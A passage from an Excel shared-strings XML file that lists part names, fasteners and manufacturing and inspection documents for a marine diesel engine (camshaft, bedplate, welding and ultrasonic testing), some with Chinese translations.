    <t>Bolt M16 X 55</t>
  </si>
  <si>
    <t>Stud bolt M12×25</t>
  </si>
  <si>
    <t>Material drawing for camshaft</t>
  </si>
  <si>
    <t>Material specification for cam shaft</t>
  </si>
  <si>
    <t>Upper metal</t>
  </si>
  <si>
    <t>Lower metal</t>
  </si>
  <si>
    <t xml:space="preserve">White metal (upper) </t>
  </si>
  <si>
    <t>White metal (lower)</t>
  </si>
  <si>
    <t>Paintings and rust prev. proc.</t>
  </si>
  <si>
    <t>Bolt M24 X 123</t>
  </si>
  <si>
    <t xml:space="preserve">Bolt </t>
  </si>
  <si>
    <t>Plug M16</t>
  </si>
  <si>
    <t>Slotted set screw M8 X 8</t>
  </si>
  <si>
    <t>Hexagon head bolt with wire hole M10 X 14</t>
  </si>
  <si>
    <t>Camshaft sper gear</t>
  </si>
  <si>
    <t>Parallel pin 6 X 16</t>
  </si>
  <si>
    <t>Wire φ1.6 X 1000</t>
  </si>
  <si>
    <t>Tool for camshaft bearing</t>
  </si>
  <si>
    <t>Main body</t>
  </si>
  <si>
    <t>Plate t16 X 32</t>
  </si>
  <si>
    <t>Plate t25 X 32</t>
  </si>
  <si>
    <t>Plate t32</t>
  </si>
  <si>
    <t>Reversing handle</t>
  </si>
  <si>
    <t>Pipe φ40 x t11</t>
  </si>
  <si>
    <t>Plate t4.5 X 25</t>
  </si>
  <si>
    <t>Reversing handle lever</t>
  </si>
  <si>
    <t>Fuel handle</t>
  </si>
  <si>
    <t>Pipe φ14 / φ13</t>
  </si>
  <si>
    <t>Bar φ30</t>
  </si>
  <si>
    <t>Fuel handle shaft center</t>
  </si>
  <si>
    <t>Limit switch fixing bracket</t>
  </si>
  <si>
    <t>Rod end bearing</t>
  </si>
  <si>
    <t>Starting pilot valve (high pressure)</t>
  </si>
  <si>
    <t>Reversing pilot valve</t>
  </si>
  <si>
    <t>Scale plate</t>
  </si>
  <si>
    <t>Guide piece for reverse</t>
  </si>
  <si>
    <t>Shaft for reversing handle</t>
  </si>
  <si>
    <t>Fixing pin φ10</t>
  </si>
  <si>
    <t>Starting handle</t>
  </si>
  <si>
    <t>Socket plug</t>
  </si>
  <si>
    <t>Grease nipple G1/8</t>
  </si>
  <si>
    <t>Parallel key 10 X 8 X 45</t>
  </si>
  <si>
    <t>Locking plate - A M8</t>
  </si>
  <si>
    <t>Bolt M6 X 10</t>
  </si>
  <si>
    <t>Bolt M8 X 40</t>
  </si>
  <si>
    <t>Bolt M8 X 80</t>
  </si>
  <si>
    <t>Bolt M12 X 35</t>
  </si>
  <si>
    <t>Bolt M12 X 40</t>
  </si>
  <si>
    <t>Bolt M16 X 40</t>
  </si>
  <si>
    <t>Bolt M16 X 50</t>
  </si>
  <si>
    <t>Countersink head screw M3 X 0.5 X 6</t>
  </si>
  <si>
    <t>Pan head screw M4 X 0.7 X 6</t>
  </si>
  <si>
    <t>Hexagon nut M4 X 0.7</t>
  </si>
  <si>
    <t>Double tongued washer M12</t>
  </si>
  <si>
    <t>Spring washer M12</t>
  </si>
  <si>
    <t>Parallel pin 6 X 32</t>
  </si>
  <si>
    <t>Parallel pin 8 X 24</t>
  </si>
  <si>
    <t>Retaining ring of shaft 10</t>
  </si>
  <si>
    <t>Retaining ring of shaft 35</t>
  </si>
  <si>
    <t>Parallel pin 13 X 30</t>
  </si>
  <si>
    <t>Plate 30 X 56 X t3.2</t>
  </si>
  <si>
    <t>Maneuvering handle assembly</t>
  </si>
  <si>
    <t>O-ring G90</t>
  </si>
  <si>
    <t>Slotted set screw M12 x 16</t>
  </si>
  <si>
    <t>Air release</t>
  </si>
  <si>
    <t>Copper gasket 18.2 X 23.5 Xt 1</t>
  </si>
  <si>
    <t>Driving gear (large)</t>
  </si>
  <si>
    <t>Driving gear (small)</t>
  </si>
  <si>
    <t>Turning disc stopper</t>
  </si>
  <si>
    <t>Adjusting plate</t>
  </si>
  <si>
    <t>Dividing piece</t>
  </si>
  <si>
    <t>Cover t6</t>
  </si>
  <si>
    <t>Gasket t1.5</t>
  </si>
  <si>
    <t>Special fitting (3-φ13)</t>
  </si>
  <si>
    <t>Copper gasket 42X49Xt1</t>
  </si>
  <si>
    <t>Slotted and castle nut</t>
  </si>
  <si>
    <t>O-ring G185</t>
  </si>
  <si>
    <t>Hexagon socket head bolt M12 X 30</t>
  </si>
  <si>
    <t>Parallel pin 10 X 80</t>
  </si>
  <si>
    <t>Copper gasket 30 X 36 X t1</t>
  </si>
  <si>
    <t>Square key</t>
  </si>
  <si>
    <t>Bolt M16 X 85</t>
  </si>
  <si>
    <t>Socket head cap screw M6×10</t>
  </si>
  <si>
    <t>Socket head cap screw M8×20</t>
  </si>
  <si>
    <t>Socket head cap screw M16×50</t>
  </si>
  <si>
    <t>Thread end taper pin(A)</t>
  </si>
  <si>
    <t>Plate t14</t>
  </si>
  <si>
    <t>Spring box body</t>
  </si>
  <si>
    <t>Link guide</t>
  </si>
  <si>
    <t xml:space="preserve">Spring retainer </t>
  </si>
  <si>
    <t>Headless set screw M6x8</t>
  </si>
  <si>
    <t>Double tongued washer M16</t>
  </si>
  <si>
    <t>Boss φ32</t>
  </si>
  <si>
    <t>Free lever</t>
  </si>
  <si>
    <t>Boss φ85</t>
  </si>
  <si>
    <t xml:space="preserve">Lever </t>
  </si>
  <si>
    <t>Plate t25×50</t>
  </si>
  <si>
    <t>Lever L=118</t>
  </si>
  <si>
    <t>Lever L=170</t>
  </si>
  <si>
    <t>Plate t3.2</t>
  </si>
  <si>
    <t>Nut M27×1.5</t>
  </si>
  <si>
    <t>Nut M16×2</t>
  </si>
  <si>
    <t xml:space="preserve">Retaining ring </t>
  </si>
  <si>
    <t xml:space="preserve">Lock pin </t>
  </si>
  <si>
    <t xml:space="preserve">Distance piece </t>
  </si>
  <si>
    <t>Link L=266</t>
  </si>
  <si>
    <t>Link L=671</t>
  </si>
  <si>
    <t xml:space="preserve">Cap </t>
  </si>
  <si>
    <t xml:space="preserve">Pointer </t>
  </si>
  <si>
    <t>Bracket (scale plate)</t>
  </si>
  <si>
    <t>Slotted set screw M5×6</t>
  </si>
  <si>
    <t>U-nut M12</t>
  </si>
  <si>
    <t>U-nut M16</t>
  </si>
  <si>
    <t>Conical spring washer M12</t>
  </si>
  <si>
    <t>Conical spring washer M20</t>
  </si>
  <si>
    <t>Parallel key 10×8×32</t>
  </si>
  <si>
    <t>Bolt M6×10</t>
  </si>
  <si>
    <t>Bolt M10×15</t>
  </si>
  <si>
    <t>Bolt M12×65</t>
  </si>
  <si>
    <t>Bolt M20×40</t>
  </si>
  <si>
    <t>Countersink head screw M4×0.7×8</t>
  </si>
  <si>
    <t>Single tongued washer M10</t>
  </si>
  <si>
    <t>Double tongued washer M27</t>
  </si>
  <si>
    <t>Plain washer M16</t>
  </si>
  <si>
    <t>Palallel pin φ6×16</t>
  </si>
  <si>
    <t>Palallel pin φ6×60</t>
  </si>
  <si>
    <t>Bearing (for driving end)</t>
  </si>
  <si>
    <t>Bearing (for free end)</t>
  </si>
  <si>
    <t>Free joint</t>
  </si>
  <si>
    <t>Shaft (For roller)</t>
  </si>
  <si>
    <t>Bearing (for roller)</t>
  </si>
  <si>
    <t>Nut M20 X 1.5</t>
  </si>
  <si>
    <t>Nut M16 X 2</t>
  </si>
  <si>
    <t>Bearing (for locking)</t>
  </si>
  <si>
    <t>Shaft (for driving end)</t>
  </si>
  <si>
    <t>Shaft (for free end)</t>
  </si>
  <si>
    <t>Shaft (for locking)</t>
  </si>
  <si>
    <t>Plate t3</t>
  </si>
  <si>
    <t>Bolt (For roller) M8 X 12</t>
  </si>
  <si>
    <t>Bolt M16</t>
  </si>
  <si>
    <t>U - nut M10</t>
  </si>
  <si>
    <t>U - nut M12</t>
  </si>
  <si>
    <t>U - nut M16</t>
  </si>
  <si>
    <t>U - nut M20</t>
  </si>
  <si>
    <t>Pins with head 16 X 55</t>
  </si>
  <si>
    <t>Split taper pin 10 X 60</t>
  </si>
  <si>
    <t>U - nut M14</t>
  </si>
  <si>
    <t>Bolt M10 X 55</t>
  </si>
  <si>
    <t>Bolt M12 X 30</t>
  </si>
  <si>
    <t>Bolt M12 X 60</t>
  </si>
  <si>
    <t>Socket head cap screw M12 X 55</t>
  </si>
  <si>
    <t xml:space="preserve">Retaining ring of shaft 16 </t>
  </si>
  <si>
    <t>Double tongued washer M20</t>
  </si>
  <si>
    <t xml:space="preserve">Split pin </t>
  </si>
  <si>
    <t>Bolt M20 X 45</t>
  </si>
  <si>
    <t>Parallel pin 6 X 20</t>
  </si>
  <si>
    <t xml:space="preserve">Spring pin </t>
  </si>
  <si>
    <t>Bracket(1)</t>
  </si>
  <si>
    <t>Bracket(2)</t>
  </si>
  <si>
    <t>Safety device main body</t>
  </si>
  <si>
    <t>Camshaft stopper</t>
  </si>
  <si>
    <t>Spring(out)</t>
  </si>
  <si>
    <t>Spring(in)</t>
  </si>
  <si>
    <t>Spring tray (lower)</t>
  </si>
  <si>
    <t>Limit switch setting plate</t>
  </si>
  <si>
    <t>Oil level gauge</t>
  </si>
  <si>
    <t>Scale palte (for AH)</t>
  </si>
  <si>
    <t>Scale palte (for AS)</t>
  </si>
  <si>
    <t>Elbow fitting retaining bolt</t>
  </si>
  <si>
    <t>Blind flange 16K-65</t>
  </si>
  <si>
    <t>Blind flange 16K-100</t>
  </si>
  <si>
    <t>Full-face gasket 16K-65</t>
  </si>
  <si>
    <t>Full-face gasket 16K-100</t>
  </si>
  <si>
    <t>Headless set screw</t>
  </si>
  <si>
    <t xml:space="preserve">Governor driving gear assembly </t>
  </si>
  <si>
    <t>Plate t35</t>
  </si>
  <si>
    <t>Plate t28</t>
  </si>
  <si>
    <t>Pipe 150A×sch160</t>
  </si>
  <si>
    <t>Adjusting liner</t>
  </si>
  <si>
    <t>Governor booster</t>
  </si>
  <si>
    <t>Joint shaft</t>
  </si>
  <si>
    <t>U-nuts M12</t>
  </si>
  <si>
    <t>Thread end taper pin (B)</t>
  </si>
  <si>
    <t>Bolt M10×20</t>
  </si>
  <si>
    <t>Bolt M16×55</t>
  </si>
  <si>
    <t>Bolt M20×50</t>
  </si>
  <si>
    <t>Socket head cap screw M10 x 65</t>
  </si>
  <si>
    <t>Headless cset screw M10 x 10</t>
  </si>
  <si>
    <t>Plain washer M6</t>
  </si>
  <si>
    <t>Plain washer M12</t>
  </si>
  <si>
    <t>Plain washer M24</t>
  </si>
  <si>
    <t>Spring washer M10</t>
  </si>
  <si>
    <t>U-nuts M5</t>
  </si>
  <si>
    <t>Valve panel fitting arrangement</t>
  </si>
  <si>
    <t>Fitting base</t>
  </si>
  <si>
    <t>Plate 50x480xt16</t>
  </si>
  <si>
    <t>Plate 50x600xt12</t>
  </si>
  <si>
    <t>Plate 60x75xt12</t>
  </si>
  <si>
    <t>L50 X 50 X 6 - 70L</t>
  </si>
  <si>
    <t>Control air diagram</t>
  </si>
  <si>
    <t>Bite type pipe joint</t>
  </si>
  <si>
    <t>Line filter</t>
  </si>
  <si>
    <t>BBS ball valve</t>
  </si>
  <si>
    <t>Assembly for cylinder lub. oil driving gear</t>
  </si>
  <si>
    <t>Driving gear assenbly</t>
  </si>
  <si>
    <t>Gear bearing support</t>
  </si>
  <si>
    <t>Plate t36</t>
  </si>
  <si>
    <t>Plate t50</t>
  </si>
  <si>
    <t>Suport</t>
  </si>
  <si>
    <t>Shaft (Small)</t>
  </si>
  <si>
    <t>Parallel key 8x7x25</t>
  </si>
  <si>
    <t>Parallel key 10x8x32</t>
  </si>
  <si>
    <t>Parallel key 20x12x80</t>
  </si>
  <si>
    <t>Headless set screw M10 x 10</t>
  </si>
  <si>
    <t>Headless set screw M16 x 20</t>
  </si>
  <si>
    <t>Steel angle L40x40x5</t>
  </si>
  <si>
    <t>Steel angle L65x65x6</t>
  </si>
  <si>
    <t>Steel angle L45x45x4</t>
  </si>
  <si>
    <t>Plate t3x16</t>
  </si>
  <si>
    <t>Handle φ10</t>
  </si>
  <si>
    <t>Shim t=1.0</t>
  </si>
  <si>
    <t>Shim t=2.0</t>
  </si>
  <si>
    <t>Shim t=3.0</t>
  </si>
  <si>
    <t>Shim t=4.0</t>
  </si>
  <si>
    <t>Shim t=5.0</t>
  </si>
  <si>
    <t>Shim t=0.5</t>
  </si>
  <si>
    <t>Shim t=0.2</t>
  </si>
  <si>
    <t>Chain RS50</t>
  </si>
  <si>
    <t>Sprocket</t>
  </si>
  <si>
    <t>Chain guide bracket</t>
  </si>
  <si>
    <t>Tensioner (ETS50)</t>
  </si>
  <si>
    <t>Chain tensioner adjustment instruction</t>
  </si>
  <si>
    <t>U-nuts M10</t>
  </si>
  <si>
    <t>Hexagon head bolts with wire hole M12 x 20</t>
  </si>
  <si>
    <t>Hexagon head bolts with wire hole M20 x 70</t>
  </si>
  <si>
    <t>Parallel key 8x7x28</t>
  </si>
  <si>
    <t>Hexagon socket head bolts M10 x 25</t>
  </si>
  <si>
    <t>Hexagon socket head bolts M10 x 40</t>
  </si>
  <si>
    <t>Bolts M6 x 10</t>
  </si>
  <si>
    <t>Bolts M10 x 15</t>
  </si>
  <si>
    <t>Bolts M12 x 30</t>
  </si>
  <si>
    <t>Bolts M12 x 40</t>
  </si>
  <si>
    <t>Bolts M16 x 40</t>
  </si>
  <si>
    <t>Bolts M20 x 60</t>
  </si>
  <si>
    <t>Bolts M20 x 75</t>
  </si>
  <si>
    <t>Socket head cap screw M10 x 35</t>
  </si>
  <si>
    <t>Plain washer M10</t>
  </si>
  <si>
    <t>Steel wire φ2.0 x 1000</t>
  </si>
  <si>
    <t>Steel wire φ1.6x400</t>
  </si>
  <si>
    <t>Stub 30 X 30 X 80</t>
  </si>
  <si>
    <t>Pad t16 X 50 X 40</t>
  </si>
  <si>
    <t>Pad t16 X 51 X 40</t>
  </si>
  <si>
    <t>Pad φ20 X 15</t>
  </si>
  <si>
    <t>Connecting piece d45 X 50</t>
  </si>
  <si>
    <t>Holder φ65 X 70</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准管路规格</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Cutting plan for bedplate (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座下料图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Cutting plan on mono block column (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架下料图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Steel plate 16x2285x8300</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Steel plate 12x1330x4530</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泄放组件</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Perforated sheet 2×D</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多孔板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Eye nut M10</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt M20 X 30</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Wire</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>φ1.6×5000L</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁丝</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Arrangement of bedplate oil drain</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座滑油出口</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料化学成分测试</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无损探伤规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Bedplate machining drawing (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Bedplate welding drawing (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接质量规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Inspection scope map "ISM" bedplate</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座检验规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊后热处理规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Instraction of testing device</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试装置说明</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防腐蚀规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面喷涂及防锈规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing of rolled steel plates</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板超声测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Work instruction for visual testing of fusion welds</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>熔焊外观检查规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing of fusion welds</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>熔焊超声检查规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing of root runs</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Work instruction for magnetic particle testing of fusion welds</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>根部焊缝磁粉探伤规程</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Welding instruction map to thrust bearing girder</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力端主轴承轴承座焊接规程</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板及铸铁热处理规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料机械性能</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料化学组分</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Welding inspection MAP to normal bearing girder</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间主轴承轴承座焊接规程</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Welding inspection map to free end bearing girder</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首端主轴承轴承座焊接规程</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板焊接图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖订货图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
